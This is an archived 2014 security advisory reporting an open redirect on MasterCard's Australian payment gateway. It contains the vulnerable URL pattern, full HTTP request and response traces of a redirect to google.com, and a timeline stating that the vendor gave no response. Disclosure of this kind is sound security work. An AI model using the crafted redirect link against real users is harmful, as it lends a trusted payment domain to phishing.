Twenty Year Anniversary

MasterCard Open Redirect

MasterCard Open Redirect
Posted Jul 28, 2014
Authored by Anastasios Monachos

MasterCard.com.au suffers from an open redirect vulnerability.

tags | exploit
MD5 | 77dc1b214c7c0b74a7b3c4e00d19a427

MasterCard Open Redirect

Change Mirror Download
=======================================================================
MasterCard - Open Redirect
=======================================================================

Affected Domain : mastercard.com.au
Local/Remote : Remote
Severity : Very Low
Vulnerable URL : https://migs.mastercard.com.au/vpcpay?vpc_ReturnURL=http://<any_domain>
Discovered by : Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com]

[Summary]

Certain unspecified input is not properly verified before being used. This can be exploited to redirect a user to an arbitrary website e.g. when a user clicks a specially crafted link to the affected script hosted on a trusted domain.

[Vulnerability Details]

GET Request:
------------
GET https://migs.mastercard.com.au/vpcpay?vpc_ReturnURL=http://www.google.com HTTP/1.1
Host: migs.mastercard.com.au
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

GET Response:
-------------
HTTP/1.1 302 Found
Date: Mon, 23 May 2014 12:26:51 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa TA1a OUR BUS IND UNI COM NAV INT"
Set-Cookie: PAY4939831625825013779=PAY8CA6985107791A1B572838CBB73CF5D3; Path=/; Secure
Expires: Sun, 15 Jun 1990 00:00:00 GMT
Cache-Control: no-cache
Set-Cookie: PS_ENCODING_COOKIE=iso-8859-1; Expires=Mon, 23-Jun-2014 12:56:51 GMT; Secure
Accept-Charset: iso-8859-1, unicode-1-1;q=0.8
Pragma: no-cache
Location: https://migs.mastercard.com.au/vpcpay?o=pt&DOID=AA93D612C3210464C0F03BF66D5DCDCE&paymentId=4999831621825113478
Content-Language: en
Content-Length: 0
Keep-Alive: timeout=15, max=79
Connection: Keep-Alive
Content-Type: text/html;charset=iso-8859-1

Follow up GET Request I:
------------------------
GET https://migs.mastercard.com.au/vpcpay?o=pt&DOID=AA93D612C3210464C0F03BF66D5DCDCE&paymentId=4999831621825113478 HTTP/1.1
Host: migs.mastercard.com.au
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

GET follow up Response I:
-------------------------
HTTP/1.1 302 Found
Date: Mon, 23 May 2014 12:27:10 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa TA1a OUR BUS IND UNI COM NAV INT"
Expires: Sun, 15 Jun 1990 00:00:00 GMT
Cache-Control: no-cache
Set-Cookie: PS_ENCODING_COOKIE=iso-8859-1; Expires=Mon, 23-Jun-2014 12:57:10 GMT; Secure
Accept-Charset: iso-8859-1, unicode-1-1;q=0.8
Pragma: no-cache
Location: http://www.google.com?vpc_Amount=0&vpc_BatchNo=0&vpc_Locale=en&vpc_Message=Required+field+vpc_Merchant+was+not+present+in+the+request&vpc_TransactionNo=0&vpc_TxnResponseCode=7
Content-Language: en
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=iso-8859-1

GET follow up Request II:
-------------------------
GET http://www.google.com/?vpc_Amount=0&vpc_BatchNo=0&vpc_Locale=en&vpc_Message=Required+field+vpc_Merchant+was+not+present+in+the+request&vpc_TransactionNo=0&vpc_TxnResponseCode=7 HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

GET follow up Response II:
--------------------------
HTTP/1.1 302 Found
Location: http://www.google.com/?gws_rd=cr&ei=QR2oU9PfGYf-ygO6yIC4Dg
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 23 May 2014 12:27:41 GMT
Server: gws
Content-Length: 258
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Alternate-Protocol: 80:quic

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.google.com/?gws_rd=cr&ei=QR2oU9PfGYf-ygO6yIC4Dg">here</A>.
</BODY></HTML>


[Time-line]

23/06/2014 - Advisory created
23/06/2014 - Mastercard notified: no response
25/06/2014 - Vendor contacted again - different department: no response
08/07/2014 - Re-contacted both departments: no response
27/07/2014 - Advisory published

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

June 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    14 Files
  • 2
    Jun 2nd
    1 Files
  • 3
    Jun 3rd
    3 Files
  • 4
    Jun 4th
    18 Files
  • 5
    Jun 5th
    21 Files
  • 6
    Jun 6th
    8 Files
  • 7
    Jun 7th
    16 Files
  • 8
    Jun 8th
    18 Files
  • 9
    Jun 9th
    5 Files
  • 10
    Jun 10th
    2 Files
  • 11
    Jun 11th
    21 Files
  • 12
    Jun 12th
    32 Files
  • 13
    Jun 13th
    15 Files
  • 14
    Jun 14th
    16 Files
  • 15
    Jun 15th
    4 Files
  • 16
    Jun 16th
    1 Files
  • 17
    Jun 17th
    2 Files
  • 18
    Jun 18th
    15 Files
  • 19
    Jun 19th
    15 Files
  • 20
    Jun 20th
    8 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close